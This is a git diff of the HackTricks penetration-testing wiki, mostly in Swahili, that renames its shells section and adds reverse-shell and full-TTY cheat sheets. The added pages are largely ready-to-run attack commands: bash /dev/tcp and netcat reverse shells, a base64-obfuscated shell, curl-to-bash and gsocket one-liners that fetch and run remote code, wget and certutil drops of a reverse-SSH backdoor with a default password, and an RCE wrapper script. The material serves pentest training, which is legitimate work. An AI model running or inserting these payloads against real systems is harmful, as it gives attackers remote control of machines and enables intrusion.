diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index bce76bffc..ad0977002 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md 
@@ -1,8 +1,8 @@ # Pentesting Methodology {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -10,7 +10,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} @@ -25,15 +25,15 @@ Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackwa - **tunataf
-_Logo za Hacktricks zimeundwa na_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Logo za Hacktricks zimetengenezwa na_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ ### 0- Mashambulizi ya Kimwili -Je, una **ufikiaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa kusoma baadhi ya [**mbinu kuhusu mashambulizi ya kimwili**](../hardware-physical-access/physical-attacks.md) na nyingine kuhusu [**kutoroka kutoka kwa programu za GUI**](../hardware-physical-access/escaping-from-gui-applications.md). +Je, una **ufikiaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa kusoma baadhi ya [**hila kuhusu mashambulizi ya kimwili**](../hardware-physical-access/physical-attacks.md) na nyingine kuhusu [**kutoroka kutoka kwa programu za GUI**](../hardware-physical-access/escaping-from-gui-applications.md). ### 1 - [Kugundua mwenyeji ndani ya mtandao](pentesting-network/#discovering-hosts)/ [Kugundua Mali za kampuni](external-recon-methodology/) -**Inategemea** ikiwa **mtihani** unaofanya ni **mtihani wa ndani au wa nje** unaweza kuwa na hamu ya kutafuta **wenyeji ndani ya mtandao wa kampuni** (mtihani wa ndani) au **kutafuta mali za kampuni kwenye mtandao** (mtihani wa nje). +**Inategemea** ikiwa **mtihani** unayofanya ni **mtihani wa ndani au wa nje** unaweza kuwa na hamu ya kutafuta **wenyeji ndani ya mtandao wa kampuni** (mtihani wa ndani) au **kutafuta mali za kampuni kwenye mtandao** (mtihani wa nje). {% hint style="info" %} Kumbuka kwamba ikiwa unafanya mtihani wa nje, mara tu unavyoweza kupata ufikiaji wa mtandao wa ndani wa kampuni unapaswa kuanzisha tena mwongo huu. 
@@ -42,13 +42,13 @@ Kumbuka kwamba ikiwa unafanya mtihani wa nje, mara tu unavyoweza kupata ufikiaji ### **2-** [**Kufurahia mtandao**](pentesting-network/) **(Ndani)** **Sehemu hii inatumika tu ikiwa unafanya mtihani wa ndani.**\ -Kabla ya kushambulia mwenyeji huenda ukapendelea **kuiba baadhi ya akidi** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** ili kujifunza **kwa pasivu/aktively(MitM)** unachoweza kupata ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing). +Kabla ya kushambulia mwenyeji huenda ukapendelea **kuiba baadhi ya akidi** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** ili kujifunza **kwa njia ya kupita/moja kwa moja (MitM)** unachoweza kupata ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing). ### 3- [Skana Bandari - Kugundua huduma](pentesting-network/#scanning-hosts) -Jambo la kwanza kufanya unapo **angalia udhaifu katika mwenyeji** ni kujua ni **huduma zipi zinaendesha** katika bandari zipi. Hebu tuone [**zana za msingi za kuskan bandari za wenyeji**](pentesting-network/#scanning-hosts). +Jambo la kwanza kufanya unapokuwa **ukitafuta udhaifu katika mwenyeji** ni kujua ni **huduma zipi zinaendesha** katika bandari zipi. Hebu tuone [**zana za msingi za kuskan bandari za wenyeji**](pentesting-network/#scanning-hosts). -### **4-** [**Kutafuta exploit za toleo la huduma**](search-exploits.md) +### **4-** [**Kutafuta matukio ya toleo la huduma**](search-exploits.md) Mara tu unavyojua ni huduma zipi zinaendesha, na labda toleo lao, unapaswa **kutafuta udhaifu unaojulikana**. Huenda ukapata bahati na kuna exploit inayoweza kukupa shell... 
@@ -59,25 +59,25 @@ Ikiwa hakuna exploit ya kuvutia kwa huduma yoyote inayofanya kazi, unapaswa kuta **Ndani ya kitabu hiki utapata mwongozo wa pentest huduma za kawaida zaidi** (na nyingine ambazo si za kawaida sana)**. Tafadhali, tafuta kwenye orodha ya kushoto sehemu ya** _**PENTESTING**_ **(huduma zimepangwa kwa bandari zao za kawaida).** **Ninataka kutoa kumbukumbu maalum kwa** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **sehemu (kama ni kubwa zaidi).**\ -Pia, mwongozo mdogo juu ya jinsi ya [**kupata udhaifu unaojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa. +Pia, mwongozo mdogo juu ya jinsi ya [**kutafuta udhaifu unaojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa. -**Ikiwa huduma yako haipo ndani ya orodha, tafuta Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **huwezi kupata chochote** kwenye Google, fanya **pentesting yako ya kipofu**, unaweza kuanza kwa **kuungana na huduma, kuifanyia fuzzing na kusoma majibu** (ikiwa yapo). +**Ikiwa huduma yako haipo ndani ya orodha, tafuta kwenye Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **huwezi kupata chochote** kwenye Google, fanya **pentesting ya kipofu** mwenyewe, unaweza kuanza kwa **kuungana na huduma, kuifanyia fuzzing na kusoma majibu** (ikiwa yapo). #### 5.1 Zana za Kiotomatiki Pia kuna zana kadhaa ambazo zinaweza kufanya **tathmini za udhaifu za kiotomatiki**. **Ningependekeza ujaribu** [**Legion**](https://github.com/carlospolop/legion)**, ambayo ni zana niliyounda na inategemea maelezo kuhusu huduma za pentesting ambazo unaweza kupata katika kitabu hiki.** -#### **5.2 Kuangamiza huduma** +#### **5.2- Kuangamiza huduma** Katika hali fulani **Brute-Force** inaweza kuwa na manufaa ili **kuathiri** **huduma**. 
[**Pata hapa CheatSheet ya huduma tofauti za kuangamiza**](brute-force.md)**.** ### 6- [Phishing](phishing-methodology/) -Ikiwa katika hatua hii huja pata udhaifu wowote wa kuvutia unaweza **kuhitaji kujaribu phishing** ili kuingia ndani ya mtandao. Unaweza kusoma mbinu yangu ya phishing [hapa](phishing-methodology/): +Ikiwa katika hatua hii huja pata udhaifu wowote wa kuvutia unaweza **kuhitaji kujaribu phishing** ili kuingia ndani ya mtandao. Unaweza kusoma mbinu zangu za phishing [hapa](phishing-methodology/): -### **7-** [**Kupata Shell**](shells/) +### **7-** [**Kupata Shell**](reverse-shells/) -Kwa namna fulani unapaswa kuwa umepata **njia yoyote ya kutekeleza msimbo** katika mwathirika. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya kurudi itakuwa ya manufaa sana](shells/). +Kwa namna fulani unapaswa kuwa umepata **njia yoyote ya kutekeleza msimbo** katika mwathirika. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya kurudi itakuwa ya manufaa sana](reverse-shells/). Hasa katika Windows unaweza kuhitaji msaada wa **kuepuka antiviruses**: [**Angalia ukurasa huu**](../windows-hardening/av-bypass.md)**.**\\ 
@@ -91,20 +91,20 @@ Ikiwa una matatizo na shell, unaweza kupata hapa mkusanyiko mdogo wa **amri muhi ### **9 -** [**Uhamishaji**](exfiltration.md) -Huenda ukahitaji **kutoa data kutoka kwa mwathirika** au hata **kuingiza kitu** (kama vile scripts za kupandisha mamlaka). **Hapa una** [**post kuhusu zana za kawaida ambazo unaweza kutumia kwa madhumuni haya**](exfiltration.md)**.** +Huenda ukahitaji **kutoa data kutoka kwa mwathirika** au hata **kuingiza kitu** (kama vile skripti za kupandisha mamlaka). **Hapa una** [**post kuhusu zana za kawaida ambazo unaweza kutumia kwa madhumuni haya**](exfiltration.md)**.** ### **10- Kupandisha Mamlaka** #### **10.1- Privesc za Mitaa** -Ikiwa wewe si **root/Msimamizi** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\ +Ikiwa wewe si **root/Administrator** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\ Hapa unaweza kupata **mwongozo wa kupandisha mamlaka kwa ndani katika** [**Linux**](../linux-hardening/privilege-escalation/) **na katika** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ Unapaswa pia kuangalia hizi kurasa kuhusu jinsi **Windows inavyofanya kazi**: * [**Uthibitishaji, Akidi, Mamlaka ya Token na UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) * Jinsi [**NTLM inavyofanya kazi**](../windows-hardening/ntlm/) * Jinsi ya [**kuiba akidi**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) katika Windows -* Mbinu kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/) +* Hila kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/) **Usisahau kuangalia zana bora za kuorodhesha njia za Kupandisha Mamlaka za ndani za Windows na Linux:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) 
@@ -122,15 +122,15 @@ Pata hapa njia tofauti za [**kudump nywila katika Windows**](https://github.com/ #### 11.2 - Kudumu **Tumia aina 2 au 3 tofauti za mitambo ya kudumu ili usihitaji kuathiri mfumo tena.**\ -**Hapa unaweza kupata baadhi ya** [**mbinu za kudumu kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** +**Hapa unaweza kupata baadhi ya** [**hila za kudumu kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** TODO: Kamilisha kudumu Post katika Windows & Linux ### 12 - Pivoting -Kwa **akidi zilizokusanywa** unaweza kuwa na ufikiaji kwa mashine nyingine, au labda unahitaji **kugundua na kuskan wenyeji wapya** (anza tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathirika wako ameunganishwa.\ +Kwa **akidi zilizokusanywa** unaweza kuwa na ufikiaji kwa mashine nyingine, au labda unahitaji **kugundua na kuskan wenyeji wapya** (anzisha tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathirika wako ameunganishwa.\ Katika kesi hii, tunneling inaweza kuwa muhimu. Hapa unaweza kupata [**post inayozungumzia tunneling**](tunneling-and-port-forwarding.md).\ -Unapaswa pia kuangalia post kuhusu [Mbinu ya pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata mbinu nzuri za kuhamasisha, kupandisha mamlaka na kudump akidi.\ +Bila shaka unapaswa pia kuangalia post kuhusu [Mbinu ya pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata hila nzuri za kuhamasisha, kupandisha mamlaka na kudump akidi.\ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa ya manufaa sana kuhamasisha katika mazingira ya Windows. ### ZAIDI 
@@ -139,13 +139,13 @@ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa #### **Kuvunja** -* [**Kuvunja Msingi wa Linux**](broken-reference) +* [**Kuvunja Msingi wa Linux**](broken-reference/) * [**Kuvunja Msingi wa Windows**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Zana za kuvunja za Msingi**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) #### [**Python ya Msingi**](python/) -#### **Mbinu za Crypto** +#### **Hila za Crypto** * [**ECB**](../crypto-and-stego/electronic-code-book-ecb.md) * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) @@ -158,8 +158,8 @@ Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackwa - **tunataf {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -167,7 +167,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md new file mode 100644 index 000000000..2bebfa185 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/README.md @@ -0,0 +1,53 @@ +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} + + +# [**Shells - Linux**](linux.md) + +# [**Shells - Windows**](windows.md) + +# [**MSFVenom - CheatSheet**](msfvenom.md) + +# [**Full TTYs**](full-ttys.md) + +# **Shells zinazozalishwa kiotomatiki** + +* [**https://reverse-shell.sh/**](https://reverse-shell.sh/) +* [**https://www.revshells.com/**](https://www.revshells.com/) +* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator) +* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop) +* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse) +* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/) +* [**https://github.com/xct/xc/**](https://github.com/xct/xc/) +* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/) +* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen) +* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) + + + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md new file mode 100644 index 000000000..c216d44a3 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/full-ttys.md @@ -0,0 +1,134 @@ +# Full TTYs + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Full TTY + +Kumbuka kwamba shell uliyoweka katika mabadiliko ya `SHELL` **lazima** iwe **imeorodheshwa ndani ya** _**/etc/shells**_ au `Thamani ya mabadiliko ya SHELL haikupatikana katika faili ya /etc/shells Tukio hili limeripotiwa`. Pia, kumbuka kwamba vipande vifuatavyo vinatumika tu katika bash. Ikiwa uko katika zsh, badilisha kuwa bash kabla ya kupata shell kwa kukimbia `bash`. + +#### Python + +{% code overflow="wrap" %} +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' + +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +{% hint style="info" %} +Unaweza kupata **idadi** ya **mifereji** na **safuwima** kwa kutekeleza **`stty -a`** +{% endhint %} + +#### script + +{% code overflow="wrap" %} +```bash +script /dev/null -qc /bin/bash #/dev/null is to not store anything +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +#### socat +```bash +#Listener: +socat file:`tty`,raw,echo=0 tcp-listen:4444 + +#Victim: +socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 +``` +### **Spawn shells** + +* `python -c 'import pty; pty.spawn("/bin/sh")'` +* `echo os.system('/bin/bash')` +* `/bin/sh -i` +* `script -qc /bin/bash /dev/null` +* `perl -e 'exec "/bin/sh";'` +* perl: `exec "/bin/sh";` +* ruby: `exec "/bin/sh"` +* lua: `os.execute('/bin/sh')` +* IRB: `exec "/bin/sh"` +* vi: `:!bash` +* vi: `:set shell=/bin/bash:shell` +* nmap: `!sh` + +## ReverseSSH + +Njia rahisi ya **interactive shell access**, pamoja na **file transfers** na **port forwarding**, ni kuweka server ya ssh iliyo na muunganisho wa kudumu [ReverseSSH](https://github.com/Fahrj/reverse-ssh) kwenye lengo. + +Hapa kuna mfano wa `x86` wenye binaries zilizoshinikizwa na upx. 
Kwa binaries nyingine, angalia [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/). + +1. Andaa mahali ili kukamata ombi la port forwarding la ssh: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -v -l -p 4444 +``` +{% endcode %} + +* (2a) Lengo la Linux: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* (2b) Lengo la Windows 10 (kwa toleo za awali, angalia [project readme](https://github.com/Fahrj/reverse-ssh#features)): + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe + +reverse-ssh.exe -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* Ikiwa ombi la kupeleka bandari la ReverseSSH lilifanikiwa, sasa unapaswa kuwa na uwezo wa kuingia kwa kutumia nenosiri la kawaida `letmeinbrudipls` katika muktadha wa mtumiaji anayekimbia `reverse-ssh(.exe)`: +```bash +# Interactive shell access +ssh -p 8888 127.0.0.1 + +# Bidirectional file transfer +sftp -P 8888 127.0.0.1 +``` +## No TTY + +Ikiwa kwa sababu fulani huwezi kupata TTY kamili, bado unaweza kuingiliana na programu ambazo zinatarajia pembejeo za mtumiaji. 
Katika mfano ufuatao, nenosiri linapitishwa kwa `sudo` kusoma faili: +```bash +expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' +``` +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md new file mode 100644 index 000000000..f476525a7 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/linux.md @@ -0,0 +1,362 @@ +# Shells - Linux + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} + +**Kundi la Usalama wa Jaribio** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +**Ikiwa una maswali kuhusu yoyote ya hizi shells unaweza kuangalia na** [**https://explainshell.com/**](https://explainshell.com) + +## Full TTY + +**Mara tu unapopata reverse shell**[ **soma ukurasa huu ili kupata full TTY**](full-ttys.md)**.** + +## Bash | sh +```bash +curl https://reverse-shell.sh/1.1.1.1:3000 | bash +bash -i >& /dev/tcp// 0>&1 +bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP +0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 +exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done + +#Short and bypass (credits to Dikline) +(sh)0>/dev/tcp/10.10.10.10/9091 +#after getting the previous shell to get the output to execute +exec >&0 +``` +Usisahau kuangalia na shell nyingine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash. + +### Shell salama ya alama +```bash +#If you need a more stable connection do: +bash -c 'bash -i >& /dev/tcp// 0>&1' + +#Stealthier method +#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 +echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null +``` +#### Maelezo ya Shell + +1. **`bash -i`**: Sehemu hii ya amri inaanzisha shell ya Bash ya kuingiliana (`-i`). +2. **`>&`**: Sehemu hii ya amri ni alama ya kifupi ya **kuhamasisha pato la kawaida** (`stdout`) na **kosa la kawaida** (`stderr`) kwenda **mahali pamoja**. +3. **`/dev/tcp//`**: Hii ni faili maalum ambayo **inaakisi muunganisho wa TCP kwa anwani ya IP na bandari iliyoainishwa**. +* Kwa **kuhamasisha pato na mwelekeo wa makosa kwenda kwenye faili hii**, amri hiyo kwa ufanisi inatuma pato la kikao cha shell ya kuingiliana kwenye mashine ya mshambuliaji. +4. **`0>&1`**: Sehemu hii ya amri **inaelekeza pembejeo ya kawaida (`stdin`) kwenda kwenye mahali pamoja na pato la kawaida (`stdout`)**. 
+ +### Unda kwenye faili na utekeleze +```bash +echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; +wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh +``` +## Forward Shell + +Wakati wa kushughulikia **Remote Code Execution (RCE)** udhaifu ndani ya programu ya wavuti inayotumia Linux, kupata reverse shell kunaweza kuzuia na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti ngumu. Katika mazingira kama haya, njia mbadala ni kuanzisha PTY (Pseudo Terminal) shell ili kuingiliana na mfumo ulioathirika kwa ufanisi zaidi. + +Zana inayopendekezwa kwa ajili ya hili ni [toboggan](https://github.com/n3rada/toboggan.git), ambayo inarahisisha mwingiliano na mazingira ya lengo. + +Ili kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyoundwa kwa muktadha wa RCE wa mfumo wako wa lengo. Kwa mfano, moduli inayoitwa `nix.py` inaweza kuandikwa kama ifuatavyo: +```python3 +import jwt +import httpx + +def execute(command: str, timeout: float = None) -> str: +# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution +token = jwt.encode( +{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" +) + +response = httpx.get( +url="https://vulnerable.io:3200", +headers={"Authorization": f"Bearer {token}"}, +timeout=timeout, +# ||BURP|| +verify=False, +) + +# Check if the request was successful +response.raise_for_status() + +return response.text +``` +Na kisha, unaweza kuendesha: +```shell +toboggan -m nix.py -i +``` +Ili kutumia moja kwa moja shell ya mwingiliano. Unaweza kuongeza `-b` kwa ajili ya uunganisho wa Burpsuite na kuondoa `-i` kwa wrapper ya rce ya msingi zaidi. + +Mwingine uwezekano ni kutumia utekelezaji wa shell ya mbele ya `IppSec` [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). 
+ +Unahitaji tu kubadilisha: + +* URL ya mwenyeji aliye hatarini +* Kichwa na kiambatisho cha payload yako (ikiwa ipo) +* Njia ambayo payload inatumwa (headers? data? taarifa za ziada?) + +Kisha, unaweza tu **kutuma amri** au hata **kutumia amri ya `upgrade`** kupata PTY kamili (kumbuka kwamba mabomba yanapozungumziwa na kuandikwa kwa kuchelewesha takriban 1.3s). + +## Netcat +```bash +nc -e /bin/sh +nc | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f +nc | /bin/bash | nc +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## gsocket + +Angalia kwenye [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) +```bash +bash -c "$(curl -fsSL gsocket.io/x)" +``` +## Telnet +```bash +telnet | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f +telnet | /bin/bash | telnet +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## Whois + +**Mshambuliaji** +```bash +while true; do nc -l ; done +``` +Ili kutuma amri, iandike, bonyeza enter na bonyeza CTRL+D (kuacha STDIN) + +**Victim** +```bash +export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done 